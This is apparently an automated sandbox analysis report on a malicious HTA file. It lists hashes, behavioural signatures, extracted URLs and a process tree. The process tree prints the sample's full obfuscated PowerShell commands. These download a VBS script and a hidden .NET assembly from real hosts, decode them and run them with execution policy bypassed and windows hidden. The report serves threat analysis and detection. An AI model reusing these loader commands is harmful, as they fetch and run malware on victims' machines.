Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
13-11-2024 07:27
Static task
static1
Behavioral task
behavioral1
Sample
mitradesignworkgoodforeveryoneforgiftedmbestthings.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
mitradesignworkgoodforeveryoneforgiftedmbestthings.hta
Resource
win10v2004-20241007-en
General
-
Target
mitradesignworkgoodforeveryoneforgiftedmbestthings.hta
-
Size
207KB
-
MD5
6e8e497a9ab2be601520a182073419f1
-
SHA1
1f66efaeed5492931779fa941b1a67967f9c0ee2
-
SHA256
faae949a7d2f32b0ae09b23d53d602dac380db26541952755c920773e46f8bcd
-
SHA512
73b1035d2975aea8dc579a307fce7f2c15b1a240063dbfdb5b13e01571a5f188c25dc6f8ad9ed300e87c760ce1a2f0e6098f1cfb199ae03e28e9476766466895
-
SSDEEP
96:43F97KoUXZbhIoUXZzhoZx79f+hs6oByayqoUXZSoUXZ4hMoUXZrQ:43F1NaZRaZKT9+7CyaytaZVaZ8aZrQ
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2516 POwERSHELl.EXe 6 1484 powershell.exe 7 1484 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1484 powershell.exe 2324 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2516 POwERSHELl.EXe 2332 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POwERSHELl.EXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2516 POwERSHELl.EXe 2332 powershell.exe 2516 POwERSHELl.EXe 2516 POwERSHELl.EXe 2324 powershell.exe 1484 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2516 POwERSHELl.EXe Token: SeDebugPrivilege 2332 powershell.exe Token: SeDebugPrivilege 2324 powershell.exe Token: SeDebugPrivilege 1484 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 1984 wrote to memory of 2516 1984 mshta.exe 30 PID 1984 wrote to memory of 2516 1984 mshta.exe 30 PID 1984 wrote to memory of 2516 1984 mshta.exe 30 PID 1984 wrote to memory of 2516 1984 mshta.exe 30 PID 2516 wrote to memory of 2332 2516 POwERSHELl.EXe 32 PID 2516 wrote to memory of 2332 2516 POwERSHELl.EXe 32 PID 2516 wrote to memory of 2332 2516 POwERSHELl.EXe 32 PID 2516 wrote to memory of 2332 2516 POwERSHELl.EXe 32 PID 2516 wrote to memory of 1636 2516 POwERSHELl.EXe 33 PID 2516 wrote to memory of 1636 2516 POwERSHELl.EXe 33 PID 2516 wrote to memory of 1636 2516 POwERSHELl.EXe 33 PID 2516 wrote to memory of 1636 2516 POwERSHELl.EXe 33 PID 1636 wrote to memory of 2844 1636 csc.exe 34 PID 1636 wrote to memory of 2844 1636 csc.exe 34 PID 1636 wrote to memory of 2844 1636 csc.exe 34 PID 1636 wrote to memory of 2844 1636 csc.exe 34 PID 2516 wrote to memory of 2600 2516 POwERSHELl.EXe 36 PID 2516 wrote to memory of 2600 2516 POwERSHELl.EXe 36 PID 2516 wrote to memory of 2600 2516 POwERSHELl.EXe 36 PID 2516 wrote to memory of 2600 2516 POwERSHELl.EXe 36 PID 2600 wrote to memory of 2324 2600 WScript.exe 37 PID 2600 wrote to memory of 2324 2600 WScript.exe 37 PID 2600 wrote to memory of 2324 2600 WScript.exe 37 PID 2600 wrote to memory of 2324 2600 WScript.exe 37 PID 2324 wrote to memory of 1484 2324 powershell.exe 39 PID 2324 wrote to memory of 1484 2324 powershell.exe 39 PID 2324 wrote to memory of 1484 2324 powershell.exe 39 PID 2324 wrote to memory of 1484 2324 powershell.exe 39
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\mitradesignworkgoodforeveryoneforgiftedmbestthings.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe"C:\Windows\sYSTEm32\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe" "pOWErSHELl.eXE -Ex ByPaSS -Nop -w 1 -C DevIcecredENtiaLDePLoymEnT.exe ; IeX($(IeX('[sysTem.tEXT.ENCODInG]'+[CHAR]58+[ChaR]58+'Utf8.gETsTriNg([SYSteM.cOnvERt]'+[chaR]0X3A+[chAr]58+'FROMBaSe64STRing('+[ChAr]0X22+'JDNjTHBiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRlRmlOSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhOa0lIQ0FhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFBZk52LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sY2l1LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIUm96bGRXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEN6Sik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhDWVBaQWZ5U3giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ6UmpHTW94ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQzY0xwYjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC4yMy4yMTIuMjMzLzMzMS9zZWV0aGViZXN0dGhpbmdzb2ZnaXJsc3NoZWlzYW1vbnRoZXJmdWNrZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NvZmdpcmxzc2hlaXNhbW9udGhlci52YlMiLDAsMCk7U1RhclQtc0xlZXAoMyk7c1RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NvZmdpcmxzc2hlaXNhbW9udGhlci52YlMi'+[ChaR]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPaSS -Nop -w 1 -C DevIcecredENtiaLDePLoymEnT.exe3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bq6pbmqk.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA95A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA959.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2844
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsofgirlssheisamonther.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdiVnBpbWFnZVVybCA9IE1SQmh0dHBzOi8vMTAxNy5maWxlbWFpbC5jJysnb20vYXBpL2ZpbGUvZycrJ2V0PycrJ2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEsnKydqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGInKydiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgTVJCO2JWcHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7YlZwaW1hZ2VCeXRlcyA9IGJWcHdlYkNsaWVudC4nKydEb3dubG9hZERhdGEoYlZwaW1hZ2VVcmwpO2JWcGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGJWcGltYWdlQnl0ZXMpO2JWcHMnKyd0YXJ0RmxhZyA9IE1SQjw8QkFTRTY0X1NUQVJUPj5NUkI7YlZwZW5kRmxhZyA9IE1SQjw8QkFTRTY0X0VORD4+TVJCO2JWcHN0YXJ0SW5kZXggPSBiVnBpbWFnZVRleHQuSW5kZXhPZihiVnBzdGFydEZsYWcpO2JWcGVuZEluZGV4ID0gYlZwaW1hZ2VUZXh0LkluZGV4T2YoYlZwZW5kRmxhZyk7YlZwc3RhcnRJbmRlJysneCAtZ2UgMCAtYW5kICcrJ2JWcGVuZEluZGV4IC1ndCBiJysnVnBzdGFydEluZGV4O2JWcHN0YXJ0SW5kJysnZXggKz0gYlZwc3RhcnRGbGFnLkxlbmd0aDtiVnBiYXMnKydlNjRMZW5ndGggPSBiVicrJ3BlbmRJbmRleCAtIGJWcHN0YXJ0SW5kZXg7YlZwYmFzZTY0Q29tbWFuZCA9IGJWJysncGknKydtYWcnKydlVGV4dC5TdWJzdHJpbmcoYlZwc3RhcnRJbmRlJysneCcrJywgYlZwYmFzZTY0TGVuZ3QnKydoKTtiVnBiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChiVnBiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5JysnKCkgdkdRIEZvckVhY2gtT2JqZWN0IHsgYlZwJysnXyB9KVstMS4uLShiVnBiYXNlNjRDb21tYW5kJysnLkxlbmd0aCcrJyldO2JWcGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyJysnb21CYXNlNjRTdHJpbmcoYlZwYmFzZTY0UmV2ZScrJ3InKydzZScrJ2QpO2JWcGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChiVnBjbycrJ21tYW4nKydkQnl0ZXMpO2JWcHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoTVJCVkFJTVJCKTtiVnB2YWlNZXRob2QuSW52b2tlKGJWcG51bGwsIEAoTVJCdHh0LlJSRlRSVy8xMzMvMzMyLjIxMi4zMi44OTEnKycvLzpwdHRoTVJCLCBNUkJkZScrJ3NhdGl2YWRvTVJCLCBNUkJkZXNhdGl2YWRvTVJCLCBNUkJkZXNhdGknKyd2YWRvTVJCLCBNUkJDYXNQb2xNUkIsIE1SQmRlJysnc2F0aXZhZG9NUkInKycsIE1SQmRlc2F0aXZhZG9NUkIsTVJCZGVzYXRpdmFkb01SQixNUkInKydkZXNhdGl2YWRvTVJCLE1SQmRlc2F0aXZhZG9NUkIsTScrJ1JCZGVzYXRpdmFkb01SQixNUkJkZXNhJysndCcrJ2l2YWRvTVJCLE1SQjFNUkIsTVJCJysnZGVzYXRpdmFkb01SQikpOycpLlJFcExhQ2UoKFtjSEFyXTk4K1tjSEFyXTg2K1tjSEFyXTExMiksW1N0cklOR11bY0hBcl0zNikuUkVwTGFDZSgndkdRJyxbU3RySU5HXVtjSEFyXTEyNCkuUkVwTGFDZSgnTVJCJyxbU3RySU5HXVtjSEFyXTM5KXwmKCAkU2hFTGxJZFsxXSskc0hlTGxJRFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('bVpimageUrl = MRBhttps://1017.filemail.c'+'om/api/file/g'+'et?'+'filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTK'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614b'+'b209c62c1730945176a0904f MRB;bVpwebClient = New-Object System.Net.WebClient;bVpimageBytes = bVpwebClient.'+'DownloadData(bVpimageUrl);bVpimageText = [System.Text.Encoding]::UTF8.GetString(bVpimageBytes);bVps'+'tartFlag = MRB<<BASE64_START>>MRB;bVpendFlag = MRB<<BASE64_END>>MRB;bVpstartIndex = bVpimageText.IndexOf(bVpstartFlag);bVpendIndex = bVpimageText.IndexOf(bVpendFlag);bVpstartInde'+'x -ge 0 -and '+'bVpendIndex -gt b'+'VpstartIndex;bVpstartInd'+'ex += bVpstartFlag.Length;bVpbas'+'e64Length = bV'+'pendIndex - bVpstartIndex;bVpbase64Command = bV'+'pi'+'mag'+'eText.Substring(bVpstartInde'+'x'+', bVpbase64Lengt'+'h);bVpbase64Reversed = -join (bVpbase64Command.ToCharArray'+'() vGQ ForEach-Object { bVp'+'_ })[-1..-(bVpbase64Command'+'.Length'+')];bVpcommandBytes = [System.Convert]::Fr'+'omBase64String(bVpbase64Reve'+'r'+'se'+'d);bVploadedAssembly = [System.Reflection.Assembly]::Load(bVpco'+'mman'+'dBytes);bVpvaiMethod = [dnlib.IO.Home].GetMethod(MRBVAIMRB);bVpvaiMethod.Invoke(bVpnull, @(MRBtxt.RRFTRW/133/332.212.32.891'+'//:ptthMRB, MRBde'+'sativadoMRB, MRBdesativadoMRB, MRBdesati'+'vadoMRB, MRBCasPolMRB, MRBde'+'sativadoMRB'+', MRBdesativadoMRB,MRBdesativadoMRB,MRB'+'desativadoMRB,MRBdesativadoMRB,M'+'RBdesativadoMRB,MRBdesa'+'t'+'ivadoMRB,MRB1MRB,MRB'+'desativadoMRB));').REpLaCe(([cHAr]98+[cHAr]86+[cHAr]112),[StrING][cHAr]36).REpLaCe('vGQ',[StrING][cHAr]124).REpLaCe('MRB',[StrING][cHAr]39)|&( $ShELlId[1]+$sHeLlID[13]+'x')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59bdc1d81f7338437e7b5fa543a0d9541
SHA133f8f748182e71c2a8de4501c5d237b0f4c288ea
SHA256aa9ce0d2cf2d0f4ac02b6c45f40789cb663e209139deea2f8918b0b18442767a
SHA512eabe05ac235015b1d3672de7800ecc81edda045c778ff0337d2e659f8c5a228031ad652d9cecb4f59a6282b84d04815605063f4d27e8ee1d7b383a90cd73349d
-
Filesize
3KB
MD56d2bd5ea8e3b275d6c2bb3d75be29cdc
SHA165d4ac3f101046e494464df258a1462eae2a0167
SHA256e31de400d7b69f60da7b64896775118ffedc43ae1b9f31473382f70aa4edc422
SHA5129b99020773d6ba66f629f6086cd75696edb43bcfbb03097fd1b4cc8e3c394836f90288ae8bede5bcd754a5548cb7b06df2ce0374afcb31c74dcfa2a8fdb101a4
-
Filesize
7KB
MD568cdc6400b28ca73553429adfada47b6
SHA1bfd0467ce64bbd41aca0f0f60b98932940105b65
SHA25602589374ea7aaae02454b3eba843b14c85ba2f7047f7238393acf2026a3a37a7
SHA5128357203e539fcb78c12da3dbc8a51c7f1a7eb31d4e051fb3e19da929874da491f204ade46804700e68f124b149a13fabc105a6eed4491c6e8e533c441cfd6ac2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5704664069ab1e548bd1a4008c97cbbbf
SHA1d1c55f1b2ead80a55f6bf8ebca6818e39bffdd87
SHA2568d77ac5238914dc181653981d129ebb34b0bbf51832384d13e74dd3de2e77209
SHA512b19606e5401a293255e78a2219e8381dbb76b81950fa74d57f9b9755254cb102b9f4f5e1134df01225979dc19455de5fdc6aabf2c7dccb0b68bcfa39300a0ece
-
Filesize
138KB
MD5a859403a72c197e1753a1519aac692e3
SHA17fbfdbb1384879f2ce069c72e4ce7b437bac8c0c
SHA2564b3e15d8f27431ef7ba26051739774ac4ab9d5584b28bff4489cf503d434f38c
SHA5129063f5760623203dd494a335040a57c3ab9a41193344f872739e0e55b43fccbb81033c528dd007952198ce089ab3dd8c9ef3b0d2b9eaba628a05b960def11ee9
-
Filesize
652B
MD517c09d92cac200b380e2a97dbfd7438c
SHA1197d6bf9107d2a1580ed0bdb1f69b1c883191c44
SHA25681d78e3326d7fffbacfc722e52fcfea9bfb4ff87f9db58fd6fbe729ec31dd2c2
SHA512a362d02ea30aa653b8f814ddb4f6ede9590eb03b80aae06539d9a0a86dd7cde3e33e5a5c7a3c872603340df3fbee99d38333fe7d1147432b644588c5a4d167e0
-
Filesize
483B
MD5381b1194ec5fc354bf3696ed51323c18
SHA17d58fdbfdaa987d85d72478f3d225686b2d8dabe
SHA2564acc1cdda62e68a822d5fd6dc065d75cb465390d1f4be7d046f811437a784455
SHA5127f434aaf3b20b7bdf694e5e14c7bd60fe4470b8ea73742ea969b282d27d4b6c18101229aef7b547774beb44f4d8c21769a11e4b3a5a833c773fea7fbe5e4a750
-
Filesize
309B
MD577471e53642aa8661c8213fff3b3aad3
SHA1e7ae3ee0065b7a9221ef77f573b617d10f4b7995
SHA256f53f5c46b8b28301cad6dec7652c288b543c3e052a60e396514eac8ecc9a0aa3
SHA5121a3019c2a0ac2f43b879adaaec2ef65a10ead9604e4bf6edbd8efa0585c4cc3ba5c69cdd2bf92359d5eb2e59837ee4b41a209ebc5d1d6b14d744b31edb5a20e1